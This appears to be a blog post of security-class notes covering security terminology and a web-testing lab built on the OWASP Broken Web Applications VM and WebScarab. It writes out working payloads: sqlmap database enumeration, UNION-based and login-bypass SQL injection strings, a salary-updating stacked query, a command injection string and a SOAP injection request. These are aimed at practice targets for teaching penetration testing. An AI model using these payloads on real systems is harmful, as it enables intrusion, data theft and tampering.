Security: 22May2017
Application security
End point security
Network security: Authentication
Content security
One factor authentication
Two factor authentication : Ex:
ATM card & Pin
Content Security:
Public data: Username
Private data: Password
Confidentiality: Encryption
Encryption + Decryption =
Cryptography
Integrity: Hash code for
checking the completeness of the data received from the sender
Security Trio:
All the below three cannot be
obtained, if the application is more secure, ease of use will be difficult.
1 Security
2 Functionality
3 Ease of Use
Security Terminology:
1 Asset:
Tangible asset: Physical assets
Intangible asset:
Software and Licenses
2. Threat: Change to asset from
intruder
3. Vulnerably: Weakness in the
application
4 Attack:
5. Exploit: Stealing the data
and intruder benefit
6. Payload: Attacker write
query and get data
7. Zero-Day: Attack with no
solution
Initially SQL injection had no
solution
8. Risk
Security Control:
OWAS: Open Web App
Attack Surface:
Attack surface is the sum total
of all the vulnerability’s in an application
E: User Input. Protocol,
Interfaces
Elements of Security:
1. Confidentiality
2. Integrity
3. Availability: Negative
factor is Denial of Service
Authorization: Access Control
Authentication: Identification
of valid user of not
Non-Repudiation:
Digital Certificate:
SHA: Secure has algorithm
MD5- Message Digest
RSA
Kinds of Attack:
Injection
Command
Code SQL injection
SQL injection:
Numerical SQL Injection
String SQL Injection
Web scarab tool for editing the
request and response
Blind SQL Injection
To know the database, tables
and contents of the website, Kali 2016 OS with SQLMAP tool can be used.
There are several command where
we can get all the details, whenever there is an error in the page.
ex: sqlmap - h
(for help)
sqlmap -u
"websiteurl" -dbs ( for getting database name)
Cross -Site Scripting:
1. Store / Persistence
2. Reflected / Temporary
Cross-Site Request Forgery: (in
.Net its also called as view state one click attack)
(CSRF/XSRF)
Lab for Web Security Testing
Lab for Web Security Testing
Download VMWare Free version from vmware website.
Install the exe.
Download : OWASP
Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost and commercial VMware products.
https://sourceforge.net/projects/owaspbwa/files/
The size is of 1.8 GB in Zip format. After Extracting its around 6GB size of multiple files. (reference file)
Download Webscarab from url.
The file is 5Mb and open the .jar file.
Click on Next until finish installation.
After finish, we can find the following files extracted. Click on Webscarab.jar to open application.
We will get the following Application UI and make sure the following highlighted controls are selected for capturing the intercept request and response.
To use the Webscarab, we should change the proxy to local host. 127.0.0.0 and port 8008.
By now all the prerequisites are installed.
Now we need to start OWSAP : We can open with VMWare work station application.
Power on the Virtual Machine. In the Virtual Machine window enter the credentials here it is
root & owaspbwa .
Notice the highlighted url. Its shows the IP address to connect to the Virtual Machine Web apps.
Enter the ip address in the client browser(local system), and hit enter. The request is first pass through the proxy settings. Here the proxy is set as 127.0.0.1 8008 . An Edit request popup will appear as shown below.
Here Intercept requests, response is selected. Symbolizes all request and response should pass through this Edit Request proxy Control.
Now we have all fields of the request header, we can change the content as we require and then Click on Apply Changes. Now again the response from the server will
Request
Example of String reversal:
Request
Example 2:
Command Injection:
" & ipconfig & netstat -an"
Example 3:
21: minutes
Ex: Hit url demo.testfire.net
Enter the html script into the textfield, ideally the html script should not execute in any textfield.
<html><body><input type="text" /></body></html>
Ex: Injecting error
This is the website at the end of the query url, am adding apostrophe, so that I will get to know database details. Here we got the database used is MySQL
Getting the number of records in the table:
another query:
here -1 returns no data from the data, there we are making union of the database() name and user()
www.zixem.altervista.org/SQLi/level1.php?id=-1 union select database(),user(),3
Bypassing UserName and Password:
' or 1=1 or '1'='1 -- -
admin@thebodgeitstore.com' or '1'='1-- -
' or '1'='1-- -
Update queries:
abcd';update salaries set salary=5000 where userid='jsmith'-- -
abcd';select * from salaries-- -
Tools:
Web Developer tool
SOAP Testing:
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:getCreditCard SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:ns1="http://lessons">
<id xsi:type="xsd:string">1 or 1=1</id>
</ns1:getCreditCard>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
No comments:
Post a Comment